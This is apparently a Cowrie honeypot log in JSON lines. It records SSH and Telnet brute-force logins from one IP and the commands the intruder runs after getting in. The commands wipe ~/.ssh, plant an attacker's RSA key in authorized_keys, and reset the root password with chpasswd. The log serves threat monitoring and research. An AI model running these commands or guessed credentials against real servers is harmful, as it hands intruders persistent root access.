{"eventid":"cowrie.login.failed","username":"ivan","password":"ivan123","message":"login attempt [ivan/ivan123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:51:05.585961Z","src_ip":"212.227.235.229","session":"11beee177a00"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:51:06.857058Z","src_ip":"212.227.235.229","session":"11beee177a00"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37104,"dst_ip":"1.2.3.4","dst_port":23,"session":"a561fd9348b6","protocol":"telnet","message":"New connection: 212.227.235.229:37104 (1.2.3.4:23) [session: a561fd9348b6]","sensor":"my-vps","timestamp":"2025-08-26T04:51:13.796005Z"}
{"eventid":"cowrie.session.closed","duration":0.1856842041015625,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:51:13.981620Z","src_ip":"212.227.235.229","session":"a561fd9348b6"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51622,"dst_ip":"1.2.3.4","dst_port":22,"session":"836a263b3b87","protocol":"ssh","message":"New connection: 217.72.205.35:51622 (1.2.3.4:22) [session: 836a263b3b87]","sensor":"my-vps","timestamp":"2025-08-26T04:51:46.712346Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:51:46.713422Z","src_ip":"217.72.205.35","session":"836a263b3b87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55548,"dst_ip":"1.2.3.4","dst_port":22,"session":"28c4eb592d4b","protocol":"ssh","message":"New connection: 212.227.235.229:55548 (1.2.3.4:22) [session: 28c4eb592d4b]","sensor":"my-vps","timestamp":"2025-08-26T04:51:54.320075Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:51:54.321122Z","src_ip":"212.227.235.229","session":"28c4eb592d4b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:51:54.397620Z","src_ip":"212.227.235.229","session":"28c4eb592d4b"}
{"eventid":"cowrie.login.success","username":"root","password":"1234!qwer","message":"login attempt [root/1234!qwer] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:51:54.744611Z","src_ip":"212.227.235.229","session":"28c4eb592d4b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:51:54.919566Z","src_ip":"212.227.235.229","session":"28c4eb592d4b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:51:54.920359Z","src_ip":"212.227.235.229","session":"28c4eb592d4b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:51:54.921483Z","src_ip":"212.227.235.229","session":"28c4eb592d4b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:51:54.999874Z","src_ip":"212.227.235.229","session":"28c4eb592d4b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:51:55.256768Z","src_ip":"212.227.235.229","session":"28c4eb592d4b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:51:55.257488Z","src_ip":"212.227.235.229","session":"28c4eb592d4b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:51:55.335997Z","src_ip":"212.227.235.229","session":"28c4eb592d4b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:51:55.336946Z","src_ip":"212.227.235.229","session":"28c4eb592d4b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55558,"dst_ip":"1.2.3.4","dst_port":22,"session":"670c296296f0","protocol":"ssh","message":"New connection: 212.227.235.229:55558 (1.2.3.4:22) [session: 670c296296f0]","sensor":"my-vps","timestamp":"2025-08-26T04:51:55.411939Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:51:55.412806Z","src_ip":"212.227.235.229","session":"670c296296f0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:51:55.489130Z","src_ip":"212.227.235.229","session":"670c296296f0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:51:55.835884Z","src_ip":"212.227.235.229","session":"670c296296f0"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:51:56.915182Z","src_ip":"212.227.235.229","session":"670c296296f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51010,"dst_ip":"1.2.3.4","dst_port":22,"session":"55c69c928c6d","protocol":"ssh","message":"New connection: 212.227.235.229:51010 (1.2.3.4:22) [session: 55c69c928c6d]","sensor":"my-vps","timestamp":"2025-08-26T04:51:56.990843Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:51:56.991593Z","src_ip":"212.227.235.229","session":"55c69c928c6d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:51:57.067543Z","src_ip":"212.227.235.229","session":"55c69c928c6d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:51:57.412936Z","src_ip":"212.227.235.229","session":"55c69c928c6d"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:51:57.489933Z","src_ip":"212.227.235.229","session":"28c4eb592d4b"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:51:57.491275Z","src_ip":"212.227.235.229","session":"55c69c928c6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42864,"dst_ip":"1.2.3.4","dst_port":22,"session":"19bff3100c75","protocol":"ssh","message":"New connection: 212.227.235.229:42864 (1.2.3.4:22) [session: 19bff3100c75]","sensor":"my-vps","timestamp":"2025-08-26T04:52:13.680080Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:52:13.681044Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:52:13.927718Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.login.success","username":"root","password":"daniel","message":"login attempt [root/daniel] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:52:14.957490Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:15.522581Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:52:15.523295Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:52:15.524117Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:15.772189Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:16.289186Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:52:16.289907Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:52:16.539024Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:16.540104Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48912,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb4c0caf9c8a","protocol":"ssh","message":"New connection: 212.227.235.229:48912 (1.2.3.4:22) [session: fb4c0caf9c8a]","sensor":"my-vps","timestamp":"2025-08-26T04:52:16.791656Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:52:16.792594Z","src_ip":"212.227.235.229","session":"fb4c0caf9c8a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:52:18.777470Z","src_ip":"212.227.235.229","session":"fb4c0caf9c8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45362,"dst_ip":"1.2.3.4","dst_port":22,"session":"61a5b6b716c7","protocol":"ssh","message":"New connection: 212.227.235.229:45362 (1.2.3.4:22) [session: 61a5b6b716c7]","sensor":"my-vps","timestamp":"2025-08-26T04:52:19.501623Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:52:19.502426Z","src_ip":"212.227.235.229","session":"61a5b6b716c7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:52:19.532255Z","src_ip":"212.227.235.229","session":"fb4c0caf9c8a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:52:19.772630Z","src_ip":"212.227.235.229","session":"61a5b6b716c7"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:20.784647Z","src_ip":"212.227.235.229","session":"fb4c0caf9c8a"}
{"eventid":"cowrie.login.failed","username":"innova","password":"innova","message":"login attempt [innova/innova] failed","sensor":"my-vps","timestamp":"2025-08-26T04:52:20.892669Z","src_ip":"212.227.235.229","session":"61a5b6b716c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48916,"dst_ip":"1.2.3.4","dst_port":22,"session":"6110ceb87c2a","protocol":"ssh","message":"New connection: 212.227.235.229:48916 (1.2.3.4:22) [session: 6110ceb87c2a]","sensor":"my-vps","timestamp":"2025-08-26T04:52:21.028804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:52:21.029718Z","src_ip":"212.227.235.229","session":"6110ceb87c2a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:22.164851Z","src_ip":"212.227.235.229","session":"61a5b6b716c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:27.097136Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T04:52:27.097960Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:27.354639Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:27.865888Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.command.input","input":"echo \"root:D3uXyshy9x0u\"|chpasswd|bash","message":"CMD: echo \"root:D3uXyshy9x0u\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T04:52:27.866643Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
